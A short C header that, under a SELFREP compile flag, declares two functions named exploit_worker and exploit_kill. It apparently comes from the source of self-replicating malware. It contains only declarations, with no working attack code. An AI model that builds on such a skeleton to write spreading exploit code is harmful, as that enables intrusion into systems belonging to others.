1#ifdef SELFREP 2#pragma once 3#include <stdint.h> 4 5void exploit_worker(); 6void exploit_kill(void); 7 8#endif 9 10